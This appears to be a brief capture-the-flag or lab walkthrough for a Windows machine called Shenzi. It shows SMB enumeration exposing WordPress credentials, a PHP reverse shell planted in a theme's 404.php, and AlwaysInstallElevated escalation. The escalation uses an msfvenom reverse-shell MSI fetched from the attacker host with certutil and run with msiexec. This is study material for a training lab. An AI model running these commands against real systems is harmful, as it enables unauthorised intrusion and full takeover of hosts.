# Shenzi
### Enumeration
```
$ smbmap -u Guest -H 192.168.189.55
Shenzi READ ONLY
$ smbclient \\\\192.168.189.55\\Shenzi -U Guest
...
passwords.txt
5) WordPress:
User: admin
Password: [REDACTED]
```
- WordPress main directory. I tried just using share name.
### Initial Access
- Php IvanSincek - 192.168.49.189 - 80 - cmd
Added it to 404.php.
Visited and got reverse shell -
### PrivEsc
winPEASexe -
```
Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
```
```
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.189 LPORT=80 -f msi -o high.msi
certutil.exe -urlcache -split -f "http://192.168.49.189/high.msi"
msiexec /quiet /qn /i C:\Users\shenzi\Desktop\high.msi
```